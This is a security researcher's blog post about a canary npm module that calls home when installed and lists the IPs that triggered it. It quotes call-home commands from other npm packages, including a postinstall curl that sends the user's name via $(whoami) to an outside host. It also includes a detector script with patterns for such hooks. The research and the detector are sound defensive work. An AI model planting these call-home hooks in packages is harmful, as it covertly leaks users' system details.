What Are The Bots Up To On npm?

Adam Baldwin
Nov 9, 2016 · 3 min read

Last year I had a thought: “who else is downloading and running / testing random modules on npm?” I postulated that there might be bots, build systems or other researchers mass-downloading and running modules from npm. I figured it might be an interesting vector to attack systems and gain a foothold in some org, and I was curious to know what that traffic looked like.

Illustration by Amy Lynn Taylor at yesand.is

So I set the bait.

I built a module called botbait. This module calls home when it’s installed, required, or tested, and reports the following:

// Data botbait sends home on install, require or test
var payload = {
  process_versions: process.versions, // node and bundled library versions
  process_platform: process.platform, // e.g. 'linux', 'darwin', 'win32'
  process_arch: process.arch,         // e.g. 'x64'
  type: process.argv[2] || 'index.js' // which hook triggered the call-home
};

The Results

The results are pretty boring. I thought there would be a lot more random installations / tests to be honest.

Total Downloads — 582

Who took the bait?

Unique Sources — 7

The sources that stand out as interesting to me are the ones from Berkeley and Microsoft. I hope that somebody there has some interesting research to share.

Raw data.

2015-06-23T21:04:11.995Z, 193.137.5.49, ran npm test
2015-11-25T18:02:53.950Z, 140.78.145.161, npm i
2016-01-29T16:26:03.223Z, 89.251.52.64, npm i
2016-08-13T18:19:28.746Z, 131.107.160.43, ran or required index.js
2016-08-26T02:56:44.625Z, 103.6.32.2, npm i
2016-09-30T22:34:10.421Z, 192.31.105.138, ran or required index.js
2016-10-08T04:07:01.342Z, 192.31.105.136, ran or required index.js

Who else is watching?

During my late nights spelunking around the npm registry I found a few others that are calling home.

I do not in any way recommend installing these modules. At the time of writing they were not malicious, but you never know.

et_phone_home — pings a URL

wget -q http://176.31.142.25/javascript_no_way_you_got_here_randomly

anarchy — Reports to Google Analytics UA-48351156-4

harmlesspackage — reports your username via postinstall hook

curl -X GET http://104.131.21.155:8043/\\?$(whoami)

… I’m sure there are others that I didn’t notice this time around.
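The two call-home modules above both do their work from package.json lifecycle scripts (a wget in one, a curl with a $(whoami) substitution in a postinstall hook in the other). As an added example, not code from the post, here is a small Node script that flags lifecycle scripts with those hallmarks before a package is installed; the package.json and the 192.0.2.10 address in it are constructed for illustration.

```javascript
// Added example: flag npm lifecycle scripts that look like they phone home.
// Hooks npm runs automatically on install/test, where a call-home would hide.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare", "pretest", "test"];

// Heuristics: network clients, literal URLs, inline node code.
const NETWORK_PATTERNS = [/\bcurl\b/, /\bwget\b/, /\bnc\b/, /https?:\/\//, /\bnode\s+-e\b/];

// $(...) or backtick substitution, e.g. smuggling $(whoami) into a URL.
const SHELL_SUBSTITUTION = /\$\(|`/;

// Returns one finding per suspicious hook: { hook, command, reasons[] }.
function scanLifecycleScripts(pkg) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const reasons = [];
    for (const re of NETWORK_PATTERNS) {
      if (re.test(cmd)) reasons.push("matches " + re);
    }
    if (SHELL_SUBSTITUTION.test(cmd)) reasons.push("embeds command substitution");
    if (reasons.length > 0) findings.push({ hook, command: cmd, reasons });
  }
  return findings;
}

// Constructed package.json modelled on the postinstall pattern above
// (TEST-NET address, not a real host).
const samplePackage = {
  name: "constructed-example",
  version: "1.0.0",
  scripts: {
    postinstall: "curl -X GET http://192.0.2.10:8043/\\?$(whoami)",
    test: "node test.js",
  },
};

for (const f of scanLifecycleScripts(samplePackage)) {
  console.log(`${f.hook}: ${f.command}\n  ${f.reasons.join("; ")}`);
}
```

This only catches the lifecycle-script variant; a module that calls home when it is required (the botbait pattern) runs from ordinary code, so `npm config set ignore-scripts true` stops the hooks but not that case.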

Final thoughts

Something I thought would be fun to dig into really wasn’t. It’s not always a glorious result for research. There isn’t a lot of automated activity that’s just downloading all the modules and doing things. Most of the activity comes from registry replicas mirroring the registry.

We spend a lot of time trying to secure the commons for the node community. It takes a lot of time and resources. If you would like to sponsor this work, get your application tested by a ridiculously talented group of hackers, or just have a friendly chat, reach out to us at contact@nodesecurity.io.

Node Security

Node Security is now at npm, Inc. helping to build a range of security products.

Written by Adam Baldwin

VP of Security at npm. Previously founded @liftsecurity, Founder @nodesecurity acquired by npm, inc
